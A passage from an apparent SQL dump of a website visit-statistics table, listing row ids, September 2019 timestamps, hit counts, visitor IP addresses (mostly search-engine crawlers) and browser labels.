(449779,1568671012,1,1,0,0,'141.8.188.11','other'),(449780,1568671121,1,1,0,0,'141.8.188.29','other'),(449781,1568671210,1,1,0,0,'66.249.66.68','chrome'),(449782,1568671341,1,1,0,0,'13.66.139.0','other'),(449783,1568671582,1,1,0,0,'66.249.66.136','chrome'),(449784,1568671644,1,1,0,0,'40.77.167.153','other'),(449785,1568672029,1,1,0,0,'66.249.66.134','chrome'),(449786,1568672085,1,1,0,0,'157.55.39.224','other'),(449787,1568672357,1,1,0,0,'66.249.66.68','chrome'),(449788,1568672407,1,1,0,0,'66.249.66.66','chrome'),(449789,1568672612,1,1,0,0,'141.8.188.29','other'),(449790,1568672913,1,1,0,0,'40.77.167.134','other'),(449791,1568673124,1,1,0,0,'66.249.66.138','chrome'),(449792,1568673381,2,2,0,0,'66.249.66.134','chrome'),(449793,1568673624,1,1,0,0,'157.55.39.139','other'),(449794,1568673643,2,2,0,0,'66.249.66.136','chrome'),(449795,1568674040,1,1,0,0,'141.8.188.29','other'),(449796,1568674144,1,1,0,0,'66.249.66.138','chrome'),(449797,1568674476,1,1,0,0,'40.77.167.27','other'),(449798,1568675191,1,1,0,0,'157.55.39.139','other'),(449799,1568675641,1,1,0,0,'66.249.66.138','chrome'),(449800,1568676639,1,1,0,0,'157.55.39.139','other'),(449801,1568677657,1,1,0,0,'66.249.66.68','chrome'),(449802,1568678175,1,1,0,0,'8.29.198.26','other'),(449803,1568678301,1,1,0,0,'8.29.198.27','other'),(449804,1568678347,3,3,0,0,'157.55.39.139','other'),(449805,1568678521,1,1,0,0,'66.249.66.66','chrome'),(449806,1568679255,2,2,0,0,'157.55.39.38','other'),(449807,1568679868,1,1,0,0,'37.73.172.233','chrome'),(449808,1568680659,1,1,0,0,'157.55.39.112','other'),(449809,1568681080,1,1,0,0,'66.249.66.138','chrome'),(449810,1568681106,1,1,0,0,'207.46.13.175','other'),(449811,1568681864,1,1,0,0,'66.249.66.134','chrome'),(449812,1568682215,1,1,0,0,'40.77.167.71','other'),(449813,1568682435,1,1,0,0,'207.46.13.175','other'),(449814,1568683635,1,1,0,0,'18.212.42.148','chrome'),(449815,1568683826,2,2,0,0,'40.77.167.132','other'),(449816,1568684625,1,1,0,0,'157.55.39.139','other'),(449817,1568684798,1,1,0,0,'40.77.167.71','other'),(449818,1568685324,1,1,0,0,'66.249.66.134','chrome'),(449819,1568685834,1,1,0,0,'40.77.167.132','other'),(449820,1568685923,2,2,0,0,'207.46.13.175','other'),(449821,1568685998,1,1,0,0,'66.249.66.66','chrome'),(449822,1568686766,1,1,0,0,'178.154.171.17','other'),(449823,1568686777,1,1,0,0,'37.9.113.102','other'),(449824,1568686923,1,1,0,0,'40.77.167.71','other'),(449825,1568687859,1,1,0,0,'40.77.167.132','other'),(449826,1568688085,1,1,0,0,'66.249.66.134','chrome'),(449827,1568688178,2,2,0,0,'40.77.167.71','other'),(449828,1568688470,1,1,0,0,'178.154.200.48','other'),(449829,1568689030,2,2,0,0,'8.29.198.25','other'),(449830,1568689869,1,1,0,0,'5.45.207.19','other'),(449831,1568689970,1,1,0,0,'66.249.66.134','chrome'),(449832,1568690138,1,1,0,0,'66.249.66.66','chrome'),(449833,1568690738,1,1,0,0,'66.249.66.138','chrome'),(449834,1568690751,1,1,0,0,'40.77.167.132','other'),(449835,1568691035,1,1,0,0,'40.77.167.71','other'),(449836,1568691153,1,1,0,0,'66.249.66.136','chrome'),(449837,1568691280,3,3,0,0,'66.249.66.134','chrome'),(449838,1568692048,2,2,0,0,'207.46.13.175','other'),(449839,1568692418,2,2,0,0,'40.77.167.71','other'),(449840,1568692458,1,1,0,0,'40.77.167.132','other'),(449841,1568693657,1,1,0,0,'66.249.66.134','chrome'),(449842,1568693880,1,1,0,0,'157.55.39.154','other'),(449843,1568694098,1,1,0,0,'207.46.13.175','other'),(449844,1568695214,2,2,0,0,'40.77.167.49','other'),(449845,1568696440,1,1,0,0,'40.77.167.49','other'),(449846,1568696461,1,1,0,0,'66.249.66.138','chrome'),(449847,1568696703,1,1,0,0,'209.17.96.98','other'),(449848,1568697122,1,1,0,0,'66.249.66.134','chrome'),(449849,1568697986,1,1,0,0,'141.8.188.11','other'),(449850,1568698053,1,1,0,0,'66.249.66.134','chrome'),(449851,1568698520,1,1,0,0,'207.46.13.175','other'),(449852,1568698846,1,1,0,0,'207.46.13.168','other'),(449853,1568699329,1,1,0,0,'66.249.66.136','chrome'),(449854,1568699348,1,1,0,0,'66.249.66.134','chrome'),(449855,1568699884,2,2,0,0,'8.29.198.27','other'),(449856,1568700534,1,1,0,0,'207.46.13.175','other'),(449857,1568700540,2,2,0,0,'157.55.39.190','other'),(449858,1568700678,1,1,0,0,'66.249.66.134','chrome'),(449859,1568701499,1,1,0,0,'91.209.11.236','other'),(449860,1568702559,1,1,0,0,'91.196.177.46','firefox'),(449861,1568702844,2,2,0,0,'66.249.66.136','chrome'),(449862,1568703934,1,1,0,0,'91.196.177.228','chrome'),(449863,1568704176,1,1,0,0,'66.249.66.64','chrome'),(449864,1568704323,1,1,0,0,'66.249.66.138','chrome'),(449865,1568704750,1,1,0,0,'37.73.137.248','other'),(449866,1568704763,3,3,0,0,'93.74.248.58','other'),(449867,1568704843,1,1,0,0,'157.55.39.190','other'),(449868,1568706101,1,1,0,0,'66.249.66.134','chrome'),(449869,1568709001,1,1,0,0,'66.249.66.136','chrome'),(449870,1568709930,1,1,0,0,'141.8.188.11','other'),(449871,1568709993,1,1,0,0,'207.46.13.168','other'),(449872,1568710734,1,1,0,0,'8.29.198.27','other'),(449873,1568710843,1,1,0,0,'8.29.198.26','other'),(449874,1568711658,1,1,0,0,'157.55.39.73','other'),(449875,1568712617,1,1,0,0,'37.53.228.106','chrome'),(449876,1568712961,4,4,0,0,'157.55.39.73','other'),(449877,1568713246,1,1,0,0,'40.77.167.26','other'),(449878,1568713757,1,1,0,0,'198.16.66.141','chrome'),(449879,1568714414,1,1,0,0,'66.249.66.66','chrome'),(449880,1568714847,1,1,0,0,'118.25.154.158','other'),(449881,1568714964,2,2,0,0,'66.249.66.138','chrome'),(449882,1568715028,2,2,0,0,'157.55.39.47','other'),(449883,1568715388,1,1,0,0,'157.55.39.22','other'),(449884,1568715963,1,1,0,0,'109.74.154.72','chrome'),(449885,1568716355,1,1,0,0,'66.249.66.134','chrome'),(449886,1568716477,2,2,0,0,'157.55.39.47','other'),(449887,1568717825,1,1,0,0,'37.73.185.154','other'),(449888,1568718501,2,2,0,0,'157.55.39.73','other'),(449889,1568718580,1,1,0,0,'157.55.39.47','other'),(449890,1568718929,1,1,0,0,'157.55.39.22','other'),(449891,1568719546,2,2,0,0,'157.55.39.47','other'),(449892,1568719946,1,1,0,0,'91.196.159.42','chrome'),(449893,1568720425,1,1,0,0,'91.196.178.169','chrome'),(449894,1568720944,1,1,0,0,'157.55.39.22','other'),(449895,1568721460,1,1,0,0,'91.196.177.110','chrome'),(449896,1568721585,1,1,0,0,'8.29.198.27','other'),(449897,1568721688,1,1,0,0,'8.29.198.25','other'),(449898,1568722285,1,1,0,0,'141.8.188.11','other'),(449899,1568722368,1,1,0,0,'46.188.31.209','msie'),(449900,1568722371,1,1,0,0,'109.173.86.91','msie'),(449901,1568722441,1,1,0,0,'91.196.178.67','chrome'),(449902,1568722509,1,1,0,0,'141.8.188.29','other'),(449903,1568722536,3,3,0,0,'104.197.208.221','chrome'),(449904,1568722571,3,3,0,0,'35.224.70.124','chrome'),(449905,1568722600,1,1,0,0,'35.202.7.204','chrome'),(449906,1568722601,2,2,0,0,'35.202.7.204','chrome'),(449907,1568722618,5,5,0,0,'34.67.251.89','chrome'),(449908,1568722641,2,2,0,0,'35.224.177.174','chrome'),(449910,1568722783,1,1,0,0,'157.55.39.22','other'),(449911,1568723875,1,1,0,0,'5.45.207.19','other'),(449912,1568724678,1,1,0,0,'157.55.39.47','other'),(449913,1568725043,2,2,0,0,'157.55.39.22','other'),(449914,1568726972,1,1,0,0,'66.249.66.134','chrome'),(449915,1568727028,1,1,0,0,'157.55.39.22','other'),(449916,1568727114,1,1,0,0,'141.8.188.11','other'),(449917,1568728745,1,1,0,0,'141.8.188.29','other'),(449918,1568728810,1,1,0,0,'207.46.13.89','other'),(449919,1568728980,1,1,0,0,'91.124.182.170','firefox'),(449920,1568729388,1,1,0,0,'207.46.13.242','other'),(449921,1568729791,1,1,0,0,'207.46.13.89','other'),(449922,1568730040,1,1,0,0,'35.203.245.186','chrome'),(449923,1568730242,1,1,0,0,'94.153.104.146','chrome'),(449924,1568730274,1,1,0,0,'157.55.39.47','other'),(449925,1568730541,1,1,0,0,'66.249.66.136','chrome'),(449926,1568732450,1,1,0,0,'8.29.198.25','other'),(449927,1568732551,1,1,0,0,'8.29.198.27','other'),(449928,1568732698,1,1,0,0,'207.46.13.163','other'),(449929,1568732830,1,1,0,0,'95.132.10.70','chrome'),(449930,1568733330,1,1,0,0,'95.108.213.4','other'),(449931,1568734554,1,1,0,0,'207.46.13.89','other'),(449932,1568736189,1,1,0,0,'91.209.11.236','other'),(449933,1568736556,1,1,0,0,'40.77.167.18','other'),(449934,1568737120,1,1,0,0,'66.249.66.138','chrome'),(449935,1568738045,1,1,0,0,'207.46.13.89','other'),(449936,1568738696,1,1,0,0,'66.249.66.68','chrome'),(449937,1568738715,1,1,0,0,'66.249.66.134','chrome'),(449938,1568739193,1,1,0,0,'40.77.167.102','other'),(449939,1568739395,1,1,0,0,'141.8.188.11','other'),(449940,1568739663,1,1,0,0,'207.46.13.163','other'),(449941,1568740382,1,1,0,0,'66.249.66.64','chrome'),(449942,1568740595,1,1,0,0,'66.249.66.136','chrome'),(449943,1568740795,1,1,0,0,'66.249.66.68','chrome'),(449944,1568740819,1,1,0,0,'5.45.207.79','other'),(449945,1568741040,2,2,0,0,'141.8.188.29','other'),(449946,1568741352,1,1,0,0,'40.77.167.53','other'),(449947,1568741478,1,1,0,0,'91.196.178.67','firefox'),(449948,1568741508,1,1,0,0,'66.249.66.134','chrome'),(449949,1568742267,1,1,0,0,'91.196.178.80','chrome'),(449950,1568742367,1,1,0,0,'207.46.13.163','other'),(449951,1568742500,1,1,0,0,'87.250.224.47','other'),(449952,1568742511,1,1,0,0,'141.8.188.29','other'),(449953,1568742840,1,1,0,0,'46.211.101.153','chrome'),(449954,1568743306,2,2,0,0,'8.29.198.25','other'),(449955,1568743631,4,4,0,0,'66.249.66.136','chrome'),(449956,1568744764,1,1,0,0,'66.249.66.136','chrome'),(449957,1568744834,2,2,0,0,'66.249.66.138','chrome'),(449958,1568745150,1,1,0,0,'66.249.66.64','chrome'),(449959,1568745158,2,2,0,0,'91.196.178.88','other'),(449960,1568745282,1,1,0,0,'207.46.13.189','other'),(449961,1568745906,1,1,0,0,'207.46.13.163','other'),(449962,1568745977,1,1,0,0,'40.77.167.155','other'),(449963,1568746103,1,1,0,0,'66.249.66.136','chrome'),(449964,1568746254,1,1,0,0,'95.108.213.8','other'),(449965,1568746303,2,2,0,0,'141.8.188.11','other'),(449966,1568746349,1,1,0,0,'5.45.207.19','other'),(449967,1568746369,1,1,0,0,'66.249.66.66','chrome'),(449968,1568746934,2,2,0,0,'66.249.66.134','chrome'),(449969,1568747010,1,1,0,0,'66.249.66.64','chrome'),(449970,1568747619,1,1,0,0,'40.77.167.1','other'),(449971,1568747741,1,1,0,0,'37.146.116.66','msie'),(449972,1568747935,1,1,0,0,'141.8.188.29','other'),(449973,1568748200,1,1,0,0,'66.249.66.136','chrome'),(449974,1568748274,1,1,0,0,'66.249.66.134','chrome'),(449975,1568748647,2,2,0,0,'40.77.167.72','other'),(449976,1568748802,2,2,0,0,'66.249.66.138','chrome'),(449977,1568749240,1,1,0,0,'141.8.188.29','other'),(449978,1568749279,1,1,0,0,'40.77.167.155','other'),(449979,1568749435,2,2,0,0,'40.77.167.1','other'),(449980,1568749725,1,1,0,0,'157.55.39.180','other'),(449981,1568749954,1,1,0,0,'46.211.65.195','chrome'),(449982,1568750024,1,1,0,0,'66.249.66.134','chrome'),(449983,1568750322,1,1,0,0,'157.55.39.181','other'),(449984,1568750536,1,1,0,0,'157.55.39.178','other'),(449985,1568750832,1,1,0,0,'141.8.188.11','other'),(449986,1568751020,1,1,0,0,'157.55.39.180','other'),(449987,1568751306,2,2,0,0,'66.249.66.136','chrome'),(449988,1568751413,1,1,0,0,'31.13.127.17','other'),(449989,1568751508,1,1,0,0,'37.73.144.68','chrome'),(449990,1568752165,1,1,0,0,'66.249.66.68','chrome'),(449991,1568752423,1,1,0,0,'157.55.39.178','other'),(449992,1568752657,1,1,0,0,'91.209.11.236','other'),(449993,1568754166,1,1,0,0,'8.29.198.26','other'),(449994,1568754284,1,1,0,0,'8.29.198.25','other'),(449995,1568754521,2,2,0,0,'40.77.167.180','other'),(449996,1568754554,2,2,0,0,'157.55.39.142','other'),(449997,1568754621,1,1,0,0,'207.46.13.242','other'),(449998,1568755320,1,1,0,0,'66.249.66.138','chrome'),(449999,1568755587,1,1,0,0,'66.249.66.134','chrome'),(450000,1568755603,1,1,0,0,'66.249.66.136','chrome'),(450001,1568755951,1,1,0,0,'157.55.39.178','other'),(450002,1568756491,1,1,0,0,'157.55.39.142','other'),(450003,1568756572,1,1,0,0,'192.145.125.98','chrome'),(450004,1568756950,1,1,0,0,'66.249.66.136','chrome'),(450005,1568757243,2,2,0,0,'95.108.213.4','other'),(450006,1568757683,1,1,0,0,'157.55.39.178','other'),(450007,1568758692,3,3,0,0,'66.249.66.134','chrome'),(450008,1568758797,1,1,0,0,'141.8.188.29','other'),(450009,1568759272,1,1,0,0,'66.249.66.136','chrome'),(450010,1568759638,1,1,0,0,'141.8.188.11','other'),(450011,1568759945,1,1,0,0,'207.46.13.12','other'),(450012,1568761351,1,1,0,0,'66.249.66.136','chrome'),(450013,1568761873,1,1,0,0,'157.55.39.142','other'),(450014,1568761918,1,1,0,0,'66.249.66.64','chrome'),(450015,1568762984,1,1,0,0,'66.249.66.136','chrome'),(450016,1568763879,1,1,0,0,'209.17.96.114','other'),(450017,1568764055,1,1,0,0,'66.249.66.134','chrome'),(450018,1568764169,1,1,0,0,'66.249.66.136','chrome'),(450019,1568764445,3,3,0,0,'157.55.39.142','other'),(450020,1568765014,1,1,0,0,'8.29.198.26','other'),(450021,1568765125,1,1,0,0,'207.46.13.12','other'),(450022,1568765139,1,1,0,0,'8.29.198.27','other'),(450023,1568765200,1,1,0,0,'141.8.188.11','other'),(450024,1568765726,2,2,0,0,'66.249.66.136','chrome'),(450025,1568767120,2,2,0,0,'40.77.167.219','other'),(450026,1568767256,2,2,0,0,'40.77.167.218','other'),(450027,1568767762,1,1,0,0,'34.222.165.164','other'),(450028,1568768421,1,1,0,0,'5.45.207.19','other'),(450029,1568768536,1,1,0,0,'87.250.224.81','other'),(450030,1568768538,1,1,0,0,'40.77.167.218','other'),(450031,1568770016,1,1,0,0,'66.249.66.136','chrome'),(450032,1568770150,1,1,0,0,'141.8.188.11','other'),(450033,1568770211,2,2,0,0,'141.8.142.103','other'),(450034,1568770225,1,1,0,0,'40.77.167.218','other'),(450035,1568770593,1,1,0,0,'66.249.66.134','chrome'),(450036,1568770836,2,2,0,0,'207.46.13.144','other'),(450037,1568771259,1,1,0,0,'157.55.39.156','other'),(450038,1568771793,1,1,0,0,'141.8.188.11','other'),(450039,1568771855,1,1,0,0,'66.249.66.64','chrome'),(450040,1568772984,1,1,0,0,'66.249.66.64','chrome'),(450041,1568774419,1,1,0,0,'207.46.13.144','other'),(450042,1568774864,1,1,0,0,'5.45.207.8','other'),(450043,1568775144,1,1,0,0,'66.249.66.138','chrome'),(450044,1568775258,4,4,0,0,'40.77.167.47','other'),(450045,1568775859,1,1,0,0,'8.29.198.27','other'),(450046,1568776003,1,1,0,0,'8.29.198.26','other'),(450047,1568776307,1,1,0,0,'207.46.13.10','other'),(450048,1568776638,1,1,0,0,'157.55.39.140','other'),(450049,1568776799,1,1,0,0,'207.46.13.144','other'),(450050,1568777831,1,1,0,0,'157.55.39.84','other'),(450051,1568778088,1,1,0,0,'141.8.188.11','other'),(450052,1568778278,1,1,0,0,'207.46.13.10','other'),(450053,1568779771,1,1,0,0,'51.15.61.228','firefox'),(450054,1568779956,1,1,0,0,'141.8.188.29','other'),(450055,1568780012,1,1,0,0,'66.249.66.134','chrome'),(450056,1568781511,1,1,0,0,'141.8.188.29','other'),(450057,1568781792,1,1,0,0,'62.205.134.182','other'),(450058,1568781827,1,1,0,0,'157.55.39.84','other'),(450059,1568783152,1,1,0,0,'91.196.178.73','chrome'),(450060,1568783430,1,1,0,0,'141.8.188.29','other'),(450061,1568783592,1,1,0,0,'157.55.39.140','other'),(450062,1568783730,1,1,0,0,'66.249.66.66','chrome'),(450063,1568783787,1,1,0,0,'207.46.13.10','other'),(450064,1568784370,1,1,0,0,'91.196.179.33','chrome'),(450065,1568784438,2,2,0,0,'66.249.66.134','chrome'),(450066,1568784574,1,1,0,0,'66.249.66.136','chrome'),(450067,1568785127,1,1,0,0,'157.55.39.140','other'),(450068,1568785895,1,1,0,0,'17.58.97.184','other'),(450069,1568786252,1,1,0,0,'66.249.66.64','chrome'),(450070,1568786640,1,1,0,0,'66.249.66.134','chrome'),(450071,1568786647,1,1,0,0,'207.46.13.10','other'),(450072,1568786665,1,1,0,0,'141.8.188.11','other'),(450073,1568786699,2,2,0,0,'8.29.198.25','other'),(450074,1568786727,1,1,0,0,'157.55.39.140','other'),(450075,1568786756,1,1,0,0,'5.45.207.79','other'),(450076,1568786992,2,2,0,0,'94.153.233.14','chrome'),(450077,1568787030,1,1,0,0,'66.249.66.66','chrome'),(450078,1568787611,1,1,0,0,'66.249.66.134','chrome'),(450079,1568787717,3,3,0,0,'66.249.66.138','chrome'),(450080,1568787950,1,1,0,0,'66.249.66.66','chrome'),(450081,1568788107,1,1,0,0,'91.196.178.169','chrome'),(450082,1568788121,1,1,0,0,'157.55.39.140','other'),(450083,1568788160,1,1,0,0,'5.45.207.79','other'),(450084,1568789840,1,1,0,0,'141.8.188.29','other'),(450085,1568790117,1,1,0,0,'91.196.178.171','firefox'),(450086,1568790421,1,1,0,0,'66.249.66.136','chrome'),(450087,1568790709,1,1,0,0,'66.249.66.66','chrome'),(450088,1568791061,1,1,0,0,'66.249.66.64','chrome'),(450089,1568791364,2,2,0,0,'40.77.167.142','other'),(450090,1568791564,1,1,0,0,'40.77.167.72','other'),(450091,1568792229,1,1,0,0,'91.196.178.169','chrome'),(450092,1568794158,1,1,0,0,'40.77.167.72','other'),(450093,1568794384,1,1,0,0,'66.249.66.134','chrome'),(450094,1568794802,1,1,0,0,'66.249.66.136','chrome'),(450095,1568795894,1,1,0,0,'141.8.188.29','other'),(450096,1568797554,2,2,0,0,'8.29.198.25','other'),(450097,1568798165,1,1,0,0,'95.108.213.4','other'),(450098,1568798491,1,1,0,0,'207.46.13.88','other'),(450099,1568798585,1,1,0,0,'66.249.66.138','chrome'),(450100,1568798623,2,2,0,0,'66.249.66.136','chrome'),(450101,1568800306,1,1,0,0,'109.74.154.72','chrome'),(450102,1568800668,1,1,0,0,'66.249.66.134','chrome'),(450103,1568800699,2,2,0,0,'66.249.66.136','chrome'),(450104,1568801956,1,1,0,0,'5.45.207.79','other'),(450105,1568802198,1,1,0,0,'66.249.66.64','chrome'),(450106,1568803402,1,1,0,0,'66.249.66.134','chrome'),(450107,1568803414,2,2,0,0,'95.213.141.126','opera'),(450108,1568803630,1,1,0,0,'207.46.13.84','other'),(450109,1568803960,1,1,0,0,'66.249.66.64','chrome'),(450110,1568804117,1,1,0,0,'66.249.66.138','chrome'),(450111,1568804557,1,1,0,0,'66.249.66.134','chrome'),(450112,1568805580,1,1,0,0,'91.196.178.186','firefox'),(450113,1568805800,1,1,0,0,'141.8.188.11','other'),(450114,1568806465,1,1,0,0,'66.249.66.136','chrome'),(450115,1568806603,1,1,0,0,'207.46.13.84','other'),(450116,1568806867,1,1,0,0,'141.8.188.29','other'),(450117,1568807509,1,1,0,0,'207.46.13.84','other'),(450118,1568807530,1,1,0,0,'66.249.66.66','chrome'),(450119,1568808410,1,1,0,0,'8.29.198.25','other'),(450120,1568808447,1,1,0,0,'178.154.200.48','other'),(450121,1568808484,1,1,0,0,'141.8.188.29','other'),(450122,1568808596,1,1,0,0,'8.29.198.26','other'),(450123,1568808676,4,4,0,0,'66.249.66.138','chrome'),(450124,1568808909,1,1,0,0,'54.81.225.130','other'),(450125,1568809019,3,3,0,0,'35.194.13.111','chrome'),(450126,1568809094,5,5,0,0,'34.66.223.9','chrome'),(450127,1568809118,3,3,0,0,'35.225.252.253','chrome'),(450128,1568809129,3,3,0,0,'35.202.175.224','chrome'),(450129,1568809140,2,2,0,0,'104.198.149.14','chrome'),(450131,1568809162,4,4,0,0,'66.249.66.134','chrome'),(450132,1568809864,1,1,0,0,'207.46.13.2','other'),(450133,1568809911,1,1,0,0,'141.8.188.11','other'),(450134,1568810244,1,1,0,0,'179.61.156.240','chrome'),(450135,1568810262,1,1,0,0,'192.210.144.14','chrome'),(450136,1568810757,1,1,0,0,'66.249.66.134','chrome'),(450137,1568810991,2,2,0,0,'66.249.66.136','chrome'),(450138,1568811009,1,1,0,0,'207.46.13.84','other'),(450139,1568811018,2,2,0,0,'207.46.13.2','other'),(450140,1568811023,1,1,0,0,'207.46.13.88','other'),(450141,1568811213,1,1,0,0,'66.249.66.64','chrome'),(450142,1568812212,1,1,0,0,'207.46.13.84','other'),(450143,1568812338,1,1,0,0,'207.46.13.15','other'),(450144,1568812990,1,1,0,0,'91.196.178.186','firefox'),(450145,1568813332,1,1,0,0,'66.249.66.136','chrome'),(450146,1568814730,1,1,0,0,'5.45.207.79','other'),(450147,1568814758,1,1,0,0,'46.211.236.214','chrome'),(450148,1568815109,1,1,0,0,'178.154.171.24','other'),(450149,1568815272,1,1,0,0,'207.46.13.2','other'),(450150,1568815338,1,1,0,0,'91.196.178.129','firefox'),(450151,1568815347,1,1,0,0,'207.46.13.88','other'),(450152,1568816449,1,1,0,0,'207.46.13.15','other'),(450153,1568817019,1,1,0,0,'37.73.150.116','chrome'),(450154,1568817167,1,1,0,0,'66.249.66.136','chrome'),(450155,1568817177,1,1,0,0,'207.46.13.84','other'),(450156,1568817273,1,1,0,0,'66.249.66.134','chrome'),(450157,1568818286,1,1,0,0,'141.8.188.65','other'),(450158,1568819276,2,2,0,0,'8.29.198.27','other'),(450159,1568819687,1,1,0,0,'66.249.66.138','chrome'),(450160,1568820414,1,1,0,0,'91.196.178.84','firefox'),(450161,1568820890,1,1,0,0,'46.211.64.44','chrome'),(450162,1568821804,1,1,0,0,'207.46.13.97','other'),(450163,1568821929,1,1,0,0,'40.77.167.103','other'),(450164,1568823127,1,1,0,0,'40.77.167.103','other'),(450165,1568823621,1,1,0,0,'66.249.66.66','chrome'),(450166,1568823819,1,1,0,0,'40.77.167.95','other'),(450167,1568824347,1,1,0,0,'87.250.224.64','other'),(450168,1568824478,1,1,0,0,'37.55.57.131','chrome'),(450169,1568824854,2,2,0,0,'66.249.66.68','chrome'),(450170,1568825690,1,1,0,0,'95.108.181.75','other'),(450171,1568825817,1,1,0,0,'95.108.181.83','other'),(450172,1568826147,1,1,0,0,'66.249.66.138','chrome'),(450173,1568826180,1,1,0,0,'66.249.66.136','chrome'),(450174,1568826291,1,1,0,0,'66.249.66.134','chrome'),(450175,1568826672,1,1,0,0,'66.249.66.68','chrome'),(450176,1568827721,1,1,0,0,'66.249.66.136','chrome'),(450177,1568828527,1,1,0,0,'66.249.66.134','chrome'),(450178,1568828668,1,1,0,0,'141.8.188.65','other'),(450179,1568828696,1,1,0,0,'40.77.167.103','other'),(450180,1568828915,1,1,0,0,'31.13.127.6','other'),(450181,1568830139,1,1,0,0,'8.29.198.25','other'),(450182,1568830346,1,1,0,0,'8.29.198.26','other'),(450183,1568830520,2,2,0,0,'60.191.38.77','firefox'),(450184,1568830596,1,1,0,0,'66.249.66.68','chrome'),(450185,1568830722,1,1,0,0,'66.249.66.66','chrome'),(450186,1568830998,1,1,0,0,'37.9.113.148','other'),(450187,1568831670,1,1,0,0,'87.250.224.107','other'),(450188,1568832028,1,1,0,0,'66.249.66.64','chrome'),(450189,1568832464,1,1,0,0,'66.249.66.136','chrome'),(450190,1568832786,1,1,0,0,'141.8.142.103','other'),(450191,1568833159,1,1,0,0,'5.45.207.19','other'),(450192,1568833647,1,1,0,0,'66.249.66.136','chrome'),(450193,1568834660,1,1,0,0,'207.46.13.204','other'),(450194,1568834669,1,1,0,0,'40.77.167.103','other'),(450195,1568835296,1,1,0,0,'66.249.66.134','chrome'),(450196,1568835414,1,1,0,0,'66.249.66.68','chrome'),(450197,1568835441,1,1,0,0,'40.77.167.83','other'),(450198,1568836155,1,1,0,0,'87.250.224.118','other'),(450199,1568836189,1,1,0,0,'207.46.13.204','other'),(450200,1568836504,1,1,0,0,'87.250.224.107','other'),(450201,1568837268,1,1,0,0,'31.13.127.25','other'),(450202,1568837370,1,1,0,0,'40.77.167.103','other'),(450203,1568837442,1,1,0,0,'66.249.66.136','chrome'),(450204,1568837551,3,3,0,0,'40.77.167.83','other'),(450205,1568838356,1,1,0,0,'66.249.66.134','chrome'),(450206,1568838527,1,1,0,0,'13.66.139.0','other'),(450207,1568839343,1,1,0,0,'141.8.188.49','other'),(450208,1568839575,1,1,0,0,'40.77.167.43','other'),(450209,1568839647,1,1,0,0,'40.77.167.103','other'),(450210,1568839676,1,1,0,0,'66.249.66.138','chrome'),(450211,1568840680,1,1,0,0,'178.158.248.67','chrome'),(450212,1568840985,2,2,0,0,'8.29.198.27','other'),(450213,1568841552,1,1,0,0,'13.66.139.0','other'),(450214,1568841693,1,1,0,0,'66.249.66.134','chrome'),(450215,1568842588,3,3,0,0,'66.249.66.138','chrome'),(450216,1568842688,1,1,0,0,'213.180.203.17','other'),(450217,1568842735,3,3,0,0,'66.249.66.134','chrome'),(450218,1568843168,1,1,0,0,'178.154.200.48','other'),(450219,1568844364,2,2,0,0,'40.77.167.43','other'),(450220,1568844710,1,1,0,0,'40.77.167.17','other'),(450221,1568845673,1,1,0,0,'178.154.171.27','other'),(450222,1568845775,1,1,0,0,'40.77.167.83','other'),(450223,1568846062,1,1,0,0,'40.77.167.43','other'),(450224,1568846187,1,1,0,0,'66.249.66.68','chrome'),(450225,1568846908,1,1,0,0,'66.249.66.134','chrome'),(450226,1568847595,1,1,0,0,'66.249.66.66','chrome'),(450227,1568847941,1,1,0,0,'66.249.66.134','chrome'),(450228,1568848089,1,1,0,0,'40.77.167.17','other'),(450229,1568848577,1,1,0,0,'40.77.167.119','other'),(450230,1568850606,1,1,0,0,'66.249.66.66','chrome'),(450231,1568850761,1,1,0,0,'66.249.66.138','chrome'),(450232,1568851756,1,1,0,0,'207.46.13.16','other'),(450233,1568851828,2,2,0,0,'8.29.198.26','other'),(450234,1568852259,1,1,0,0,'157.55.39.139','other'),(450235,1568852615,1,1,0,0,'5.255.253.38','other'),(450236,1568852733,1,1,0,0,'207.46.13.16','other'),(450237,1568852895,1,1,0,0,'40.77.167.17','other'),(450238,1568853413,1,1,0,0,'141.8.188.65','other'),(450239,1568854854,1,1,0,0,'40.77.167.76','other'),(450240,1568855219,1,1,0,0,'66.249.66.66','chrome'),(450241,1568855259,2,2,0,0,'66.249.66.136','chrome'),(450242,1568855591,1,1,0,0,'40.77.167.81','other'),(450243,1568856045,2,2,0,0,'66.249.66.134','chrome'),(450244,1568856179,1,1,0,0,'207.46.13.16','other'),(450245,1568856501,1,1,0,0,'157.55.39.251','other'),(450246,1568857439,1,1,0,0,'157.55.39.139','other'),(450247,1568857456,1,1,0,0,'40.77.167.81','other'),(450248,1568858465,1,1,0,0,'157.55.39.251','other'),(450249,1568858621,1,1,0,0,'207.46.13.16','other'),(450250,1568859595,1,1,0,0,'207.46.13.16','other'),(450251,1568862200,2,2,0,0,'40.77.167.81','other'),(450252,1568862680,1,1,0,0,'8.29.198.26','other'),(450253,1568862937,1,1,0,0,'8.29.198.25','other'),(450254,1568863217,1,1,0,0,'157.55.39.251','other'),(450255,1568863670,1,1,0,0,'207.46.13.16','other'),(450256,1568864195,1,1,0,0,'157.55.39.139','other'),(450257,1568864215,1,1,0,0,'66.249.66.136','chrome'),(450258,1568864819,1,1,0,0,'91.209.11.236','other'),(450259,1568865103,1,1,0,0,'66.249.66.68','chrome'),(450260,1568865199,1,1,0,0,'157.55.39.139','other'),(450261,1568865484,1,1,0,0,'207.46.13.16','other'),(450262,1568865730,1,1,0,0,'157.55.39.251','other'),(450263,1568866840,1,1,0,0,'207.46.13.16','other'),(450264,1568867329,1,1,0,0,'157.55.39.251','other'),(450265,1568867438,1,1,0,0,'40.77.167.81','other'),(450266,1568868235,1,1,0,0,'62.205.134.182','other'),(450267,1568868316,1,1,0,0,'157.55.39.251','other'),(450268,1568868425,1,1,0,0,'207.46.13.180','other'),(450269,1568868830,1,1,0,0,'40.77.167.81','other'),(450270,1568868888,2,2,0,0,'66.249.66.68','chrome'),(450271,1568869112,14,14,0,0,'34.67.92.212','firefox'),(450272,1568869567,1,1,0,0,'66.249.66.136','chrome'),(450273,1568869632,1,1,0,0,'40.77.167.85','other'),(450274,1568869633,1,1,0,0,'66.249.66.138','chrome'),(450275,1568870729,1,1,0,0,'40.77.167.87','other'),(450276,1568871278,1,1,0,0,'141.8.132.16','other'),(450277,1568872544,1,1,0,0,'141.8.142.191','other'),(450278,1568872672,1,1,0,0,'91.196.177.46','firefox'),(450279,1568872972,1,1,0,0,'95.108.181.75','other'),(450280,1568873020,1,1,0,0,'40.77.167.87','other'),(450281,1568873552,1,1,0,0,'8.29.198.26','other'),(450282,1568873796,1,1,0,0,'8.29.198.25','other'),(450283,1568874870,1,1,0,0,'66.249.66.134','chrome'),(450284,1